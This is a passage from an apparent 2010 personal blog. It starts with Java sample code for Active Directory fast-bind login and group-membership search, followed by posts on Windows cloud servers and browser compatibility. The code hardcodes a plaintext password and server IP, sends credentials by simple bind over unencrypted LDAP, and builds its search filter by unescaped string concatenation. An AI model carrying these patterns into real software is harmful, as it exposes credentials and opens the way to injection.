  return null;
 }

 public String getID() {
  return "1.2.840.113556.1.4.1781";
 }

 public boolean isCritical() {
  return true;
 }
}

public class LDAPBinder {
 public Hashtable env = null;
 public LdapContext ctx = null;
 public Control[] connCtls = null;

 public LDAPBinder(String ldapurl) {
  env = new Hashtable();
  env.put(Context.INITIAL_CONTEXT_FACTORY,
    "com.sun.jndi.ldap.LdapCtxFactory");
  env.put(Context.SECURITY_AUTHENTICATION, "simple");
  env.put(Context.PROVIDER_URL, ldapurl);

  connCtls = new Control[] { new FastBindConnectionControl() };

  try {
   ctx = new InitialLdapContext(env, connCtls);
        
  } catch (NamingException e) {
   System.out.println("Naming exception " + e);
  }
 }

 public boolean authenticate(String username, String password) {
  try {
   ctx.addToEnvironment(Context.SECURITY_PRINCIPAL, username);
   ctx.addToEnvironment(Context.SECURITY_CREDENTIALS, password);
   ctx.reconnect(connCtls);
   System.out.println(username + " is authenticated");
      return true;
  }

  catch (AuthenticationException e) {
   System.out.println(username + " is not authenticated");
   return false;
  } catch (NamingException e) {
   System.out.println(username + " is not authenticated");
   return false;
  }
 }

 public void finito() {
  try {
   ctx.close();
   System.out.println("Context is closed");
  } catch (NamingException e) {
   System.out.println("Context close failure " + e);
  }
 }

 public void getMembership(String name) {
  // we only need each matching group's "member" attribute
  String[] returns = {"member"};
  SearchControls sc = new SearchControls();
  sc.setSearchScope(SearchControls.SUBTREE_SCOPE);
  sc.setReturningAttributes(returns);
  try {
   // find entries under the OU whose memberOf contains the given group DN
   NamingEnumeration ne = ctx.search("OU=web,DC=mainguy,DC=org", "(memberOf=" + name + ")", sc);
   
   while (ne.hasMoreElements()) {
    SearchResult sr = (SearchResult)ne.next();
    System.out.println("+" + sr.getName());
    
    Attributes attr = sr.getAttributes();
    System.out.println("--" + attr.get("member").size());

    NamingEnumeration allUsers = attr.get("member").getAll();
    
    while (allUsers.hasMoreElements()) {
     String value = (String)allUsers.next();
     System.out.println("---"+value);
     
    }
        
   }
  } catch (Exception e) {
   e.printStackTrace();
  }
 }
 /**
  * @param args
  */
 public static void main(String[] args) {
  LDAPBinder binder = new LDAPBinder("ldap://173.203.66.30:389");
  binder.authenticate("maxplanck@mainguy.org", "supersecret");
  binder.getMembership("CN=Germany National Sales,OU=web,DC=mainguy,DC=org");

  binder.finito();
 }

}

Saturday, June 12, 2010

Why windows is useful in the cloud

OK, I realize that from a previous post it may seem like I think windows is completely non-functional in a cloud environment.

Let me back up a little...

From my perspective, running production servers on virtual machines spun up on demand is not useful (yet) with the windows operating system. The windows OS strategy is just not responsive enough to this sort of business requirement (yet).

That having been said, I just finished spinning up a windows 2003 server instance on rackspace... Why? I need to investigate some Active Directory problems we're trying to solve at work right now. I spent 4 hours downloading the massive DVD install image (and wading through a bunch of crazy MS registration stuff) for a 10 day TRIAL version of the OS.

I then went over to my rackspace account (because of a different problem) and realized they could set up the server I needed. I clicked "create server" and they had a virtual server up in 15 minutes. Yes, it costs more to run this server than my Ubuntu instances, but it's only going to run for a couple of hours over the next 2 days so I don't really care.

In short, on-demand virtual windows machines (I'd love some XP/Vista/Windows 7 instances for testing our software, hint hint) are super useful and worth their weight in gold (maybe even platinum), but this doesn't mean windows is a good distributed virtual server platform.

Thursday, June 3, 2010

firefox 3.6 and google chrome

I happened to notice that mygopher.com doesn't seem to work properly with firefox 3.6 OR google chrome... that's about 25-50% of "normal" web traffic. Note: if the techie people show you log files that indicate firefox is really only 5% (or some other low number), ask them "how could ANYONE with firefox possibly be using the site if it doesn't actually WORK with firefox?".

I used to be a little self-conscious about posting gripes about browser compatibility, but now that I've seen the real numbers from a number of sites that get millions of hits, I'm fairly confident that firefox (and even chrome) are actually pretty important at this point. Right now I support a couple of non-technical sites that get millions of hits per month: IE gets around 70%, firefox around 20%, and chrome around 5% (the rest is a mixed bag).

I'd recommend letting the tech folks take about a week to make the site at least work with these browsers. In all fairness, I guess it is possible that the site works with the windows versions of chrome and firefox (I'm using linux), but I suspect it's equally broken on windows. At this point, cross browser compatibility is a commodity and no professional organization should allow incompatibility on a public site (IMHO).